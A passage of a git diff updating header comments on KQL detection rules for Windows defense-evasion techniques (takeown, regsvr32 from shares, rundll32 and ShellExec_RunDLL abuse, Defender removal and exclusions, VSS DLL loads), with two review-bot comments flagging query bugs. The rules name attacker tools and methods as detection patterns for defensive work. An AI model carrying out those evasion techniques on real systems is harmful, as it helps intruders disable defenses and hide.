-// Author: frack113
-// Date: 2022-01-30
-// Level: medium
-// Description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1222.001
-// False Positives:
-// - Scripts created by developers and admins
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: Suspicious Recursive Takeown
+// Author: frack113
+// Date: 2022-01-30
+// Level: medium
+// Description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1222.001
+// False Positives:
+// - Scripts created by developers and admins
+// - Administrative activity
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/f " and ProcessCommandLine contains "/r") and FolderPath endswith "\\takeown.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql b/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql
index 06baeb9e..0e32de9b 100644
--- a/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql
+++ b/KQL/rules/Defense Evasion/suspicious_regsvr32_execution_from_remote_share.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Regsvr32 Execution From Remote Share
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-31
-// Level: high
-// Description: Detects REGSVR32.exe to execute DLL hosted on remote shares
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.010
-
-DeviceProcessEvents
+// Title: Suspicious Regsvr32 Execution From Remote Share
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-31
+// Level: high
+// Description: Detects REGSVR32.exe to execute DLL hosted on remote shares
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "\\REGSVR32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql b/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql
index 32519eac..9d59bb0c 100644
--- a/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_response_file_execution_via_odbcconf_exe.kql
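Review bot: The fallback branch `ProcessVersionInfoOriginalFileName =~ "\\REGSVR32.EXE"` on the query line can never match, because the version-info OriginalFileName field carries a bare file name and never a leading backslash; every other rule in this batch compares that field against a plain name such as `"netsh.exe"` or `"svchost.exe"`. As written the rule only fires through the `FolderPath endswith "\\regsvr32.exe"` branch, so a renamed copy of regsvr32 loading a DLL from a UNC path is missed even though the OriginalFileName check exists precisely to catch that case. Change it to `ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE"`. The hunk only changes the header lines, so this defect predates the commit, but it is worth fixing in the regenerated output since the converter appears to emit it.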
@@ -1,12 +1,12 @@
-// Title: Suspicious Response File Execution Via Odbcconf.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-22
-// Level: high
-// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.008
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Suspicious Response File Execution Via Odbcconf.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: high
+// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not((ProcessCommandLine contains ".rsp" or (ProcessCommandLine contains ".exe /E /F \"C:\\WINDOWS\\system32\\odbcconf.tmp\"" and FolderPath =~ "C:\\Windows\\System32\\odbcconf.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\runonce.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql b/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql
index aff33994..ca52bdec 100644
--- a/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql
+++ b/KQL/rules/Defense Evasion/suspicious_rundll32_activity_invoking_sys_file.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Rundll32 Activity Invoking Sys File
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-03-05
-// Level: high
-// Description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011
-
-DeviceProcessEvents
+// Title: Suspicious Rundll32 Activity Invoking Sys File
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-05
+// Level: high
+// Description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "rundll32.exe" and (ProcessCommandLine contains ".sys," or ProcessCommandLine contains ".sys ")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql b/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql
index e45820a0..48fbf13d 100644
--- a/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql
+++ b/KQL/rules/Defense Evasion/suspicious_rundll32_execution_with_image_extension.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Rundll32 Execution With Image Extension
-// Author: Hieu Tran
-// Date: 2023-03-13
-// Level: high
-// Description: Detects the execution of Rundll32.exe with DLL files masquerading as image files
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011
-
-DeviceProcessEvents
+// Title: Suspicious Rundll32 Execution With Image Extension
+// Author: Hieu Tran
+// Date: 2023-03-13
+// Level: high
+// Description: Detects the execution of Rundll32.exe with DLL files masquerading as image files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".cr2" or ProcessCommandLine contains ".eps" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".ico" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".nef" or ProcessCommandLine contains ".orf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".raw" or ProcessCommandLine contains ".sr2" or ProcessCommandLine contains ".tif" or ProcessCommandLine contains ".tiff") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql b/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql
index 880bdc77..005aff3c 100644
--- a/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql
+++ b/KQL/rules/Defense Evasion/suspicious_rundll32_setupapi_dll_activity.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Rundll32 Setupapi.dll Activity
-// Author: Konstantin Grishchenko, oscd.community
-// Date: 2020-10-07
-// Level: medium
-// Description: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011
-// False Positives:
-// - Scripts and administrative tools that use INF files for driver installation with setupapi.dll
-
-DeviceProcessEvents
+// Title: Suspicious Rundll32 Setupapi.dll Activity
+// Author: Konstantin Grishchenko, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+// - Scripts and administrative tools that use INF files for driver installation with setupapi.dll
+
+DeviceProcessEvents
 | where FolderPath endswith "\\runonce.exe" and (InitiatingProcessCommandLine contains "setupapi.dll" and InitiatingProcessCommandLine contains "InstallHinfSection") and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql b/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql
index 03b9b02d..57d3591f 100644
--- a/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql
+++ b/KQL/rules/Defense Evasion/suspicious_service_binary_directory.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Service Binary Directory
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-03-09
-// Level: high
-// Description: Detects a service binary running in a suspicious directory
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1202
-
-DeviceProcessEvents
+// Title: Suspicious Service Binary Directory
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-09
+// Level: high
+// Description: Detects a service binary running in a suspicious directory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
 | where (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\Users\\All Users\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Searches\\" or FolderPath contains "C:\\Perflogs\\" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\" or FolderPath contains "\\Windows\\addins\\") and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_service_installed.kql b/KQL/rules/Defense Evasion/suspicious_service_installed.kql
index 12a796f6..d7f7bd5b 100644
--- a/KQL/rules/Defense Evasion/suspicious_service_installed.kql
+++ b/KQL/rules/Defense Evasion/suspicious_service_installed.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious Service Installed
-// Author: xknow (@xknow_infosec), xorxes (@xor_xes)
-// Date: 2019-04-08
-// Level: medium
-// Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.
-// Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.t1562.001, attack.defense-evasion
-// False Positives:
-// - Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it.
-
-DeviceRegistryEvents
+// Title: Suspicious Service Installed
+// Author: xknow (@xknow_infosec), xorxes (@xor_xes)
+// Date: 2019-04-08
+// Level: medium
+// Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.
+// Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1562.001, attack.defense-evasion
+// False Positives:
+// - Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it.
+
+DeviceRegistryEvents
 | where (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\NalDrv\\ImagePath", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\PROCEXP152\\ImagePath")) and (not((RegistryValueData contains "\\WINDOWS\\system32\\Drivers\\PROCEXP152.SYS" and (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe" or InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql b/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql
index a7fe1b13..bfff2e09 100644
--- a/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql
+++ b/KQL/rules/Defense Evasion/suspicious_shellexec_rundll_call_via_ordinal.kql
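Review bot: The exact-match list `RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\NalDrv\\ImagePath", ...)` on the query line names a hive path that does not exist on Windows — the real keys are `CurrentControlSet` (a link) or `ControlSet001`/`ControlSet002`, never `CurrentControlSet001` — so with `in~` the rule can never fire and the KDU/Ghost-In-The-Logs driver install it documents goes undetected. It also looks like the value name `ImagePath` has been folded into the key path, whereas the registry event schema this query targets appears to report the key and the value name in separate fields, which would be a second reason for zero matches; confirm against the table schema. A path-agnostic form such as `| where (RegistryKey endswith "\\Services\\NalDrv" or RegistryKey endswith "\\Services\\PROCEXP152") and RegistryValueName =~ "ImagePath" and (not((RegistryValueData contains ...` with the existing exclusion kept would match whichever control set the event carries. The hunk only changes header lines, so this is pre-existing converter output rather than something this commit introduced.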
@@ -1,11 +1,11 @@
-// Title: Suspicious ShellExec_RunDLL Call Via Ordinal
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024-12-01
-// Level: high
-// Description: Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands.
-// Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011
-
-DeviceProcessEvents
+// Title: Suspicious ShellExec_RunDLL Call Via Ordinal
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-12-01
+// Level: high
+// Description: Detects suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through the ordinal number to launch other commands.
+// Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
 | where (InitiatingProcessCommandLine contains "SHELL32.DLL" and (InitiatingProcessCommandLine contains "#568" or InitiatingProcessCommandLine contains "#570" or InitiatingProcessCommandLine contains "#572" or InitiatingProcessCommandLine contains "#576")) and ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "comspec" or InitiatingProcessCommandLine contains "iex" or InitiatingProcessCommandLine contains "Invoke-" or InitiatingProcessCommandLine contains "msiexec" or InitiatingProcessCommandLine contains "odbcconf" or InitiatingProcessCommandLine contains "regsvr32") or (InitiatingProcessCommandLine contains "\\Desktop\\" or InitiatingProcessCommandLine contains "\\ProgramData\\" or InitiatingProcessCommandLine contains "\\Temp\\" or InitiatingProcessCommandLine contains "\\Users\\Public\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql b/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql
index 0e879f4f..1c1335e8 100644
--- a/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql
+++ b/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious Speech Runtime Binary Child Process
-// Author: andrewdanis
-// Date: 2025-10-23
-// Level: high
-// Description: Detects suspicious Speech Runtime Binary Execution by monitoring its child processes.
-// Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1021.003, attack.t1218
-// False Positives:
-// - Unlikely.
-
-DeviceProcessEvents
+// Title: Suspicious Speech Runtime Binary Child Process
+// Author: andrewdanis
+// Date: 2025-10-23
+// Level: high
+// Description: Detects suspicious Speech Runtime Binary Execution by monitoring its child processes.
+// Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1021.003, attack.t1218
+// False Positives:
+// - Unlikely.
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\SpeechRuntime.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql b/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql
index 1050b6ad..a22c6dfa 100644
--- a/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql
+++ b/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Splwow64 Without Params
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-08-23
-// Level: high
-// Description: Detects suspicious Splwow64.exe process without any command line parameters
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1202
-
-DeviceProcessEvents
+// Title: Suspicious Splwow64 Without Params
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects suspicious Splwow64.exe process without any command line parameters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
 | where ProcessCommandLine endswith "splwow64.exe" and FolderPath endswith "\\splwow64.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql b/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql
index 0bc2610c..2e9d881e 100644
--- a/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql
+++ b/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Uninstall of Windows Defender Feature via PowerShell
-// Author: yxinmiracle
-// Date: 2025-08-22
-// Level: high
-// Description: Detects the use of PowerShell with Uninstall-WindowsFeature or Remove-WindowsFeature cmdlets to disable or remove the Windows Defender GUI feature, a common technique used by adversaries to evade defenses.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-
-DeviceProcessEvents
+// Title: Suspicious Uninstall of Windows Defender Feature via PowerShell
+// Author: yxinmiracle
+// Date: 2025-08-22
+// Level: high
+// Description: Detects the use of PowerShell with Uninstall-WindowsFeature or Remove-WindowsFeature cmdlets to disable or remove the Windows Defender GUI feature, a common technique used by adversaries to evade defenses.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "Windows-Defender" and (ProcessCommandLine contains "Uninstall-WindowsFeature" or ProcessCommandLine contains "Remove-WindowsFeature") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql b/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql
index 8ef21a2e..e2315f37 100644
--- a/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql
+++ b/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Usage Of ShellExec_RunDLL
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-01
-// Level: high
-// Description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Suspicious Usage Of ShellExec_RunDLL
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-01
+// Level: high
+// Description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "ShellExec_RunDLL" and (ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "comspec" or ProcessCommandLine contains "iex" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "odbcconf" or ProcessCommandLine contains "regsvr32")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql
index 9f4eb0a1..8852defd 100644
--- a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql
+++ b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Volume Shadow Copy VSS_PS.dll Load
-// Author: Markus Neis, @markus_neis
-// Date: 2021-07-07
-// Level: high
-// Description: Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes.
-// It is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts.
-// The fact that it is loaded by processes that are not typically associated with VSS operations can indicate suspicious activity.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.impact, attack.t1490
-
-DeviceImageLoadEvents
+// Title: Suspicious Volume Shadow Copy VSS_PS.dll Load
+// Author: Markus Neis, @markus_neis
+// Date: 2021-07-07
+// Level: high
+// Description: Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes.
+// It is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts.
+// The fact that it is loaded by processes that are not typically associated with VSS operations can indicate suspicious activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1490
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\vss_ps.dll" and (not((isnull(InitiatingProcessFolderPath) or ((InitiatingProcessFolderPath endswith "\\clussvc.exe" or InitiatingProcessFolderPath endswith "\\dismhost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\appcmd.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\iissetup.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe" or InitiatingProcessFolderPath endswith "\\srtasks.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\System32\\SystemPropertiesAdvanced.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\tiworker.exe" or InitiatingProcessFolderPath endswith "\\vssvc.exe" or InitiatingProcessFolderPath endswith "\\vssadmin.exe" or InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\") or (InitiatingProcessCommandLine contains "\\dismhost.exe {" and InitiatingProcessCommandLine startswith "C:\\$WinREAgent\\Scratch\\")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql
index 6a7a594d..72721a75 100644
--- a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql
+++ b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Volume Shadow Copy Vssapi.dll Load
-// Author: frack113
-// Date: 2022-10-31
-// Level: high
-// Description: Detects the image load of VSS DLL by uncommon executables
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.impact, attack.t1490
-
-DeviceImageLoadEvents
+// Title: Suspicious Volume Shadow Copy Vssapi.dll Load
+// Author: frack113
+// Date: 2022-10-31
+// Level: high
+// Description: Detects the image load of VSS DLL by uncommon executables
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1490
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\vssapi.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))))) and (not(((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql b/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql
index aed0ddc8..9d5b0e1c 100644
--- a/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql
+++ b/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Vsls-Agent Command With AgentExtensionPath Load
-// Author: bohops
-// Date: 2022-10-30
-// Level: medium
-// Description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - False positives depend on custom use of vsls-agent.exe
-
-DeviceProcessEvents
+// Title: Suspicious Vsls-Agent Command With AgentExtensionPath Load
+// Author: bohops
+// Date: 2022-10-30
+// Level: medium
+// Description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - False positives depend on custom use of vsls-agent.exe
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "--agentExtensionPath" and FolderPath endswith "\\vsls-agent.exe") and (not(ProcessCommandLine contains "Microsoft.VisualStudio.LiveShare.Agent."))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql b/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql
index 807e3a4e..35bbfec1 100644
--- a/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql
+++ b/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
-// Author: frack113
-// Date: 2022-02-13
-// Level: medium
-// Description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
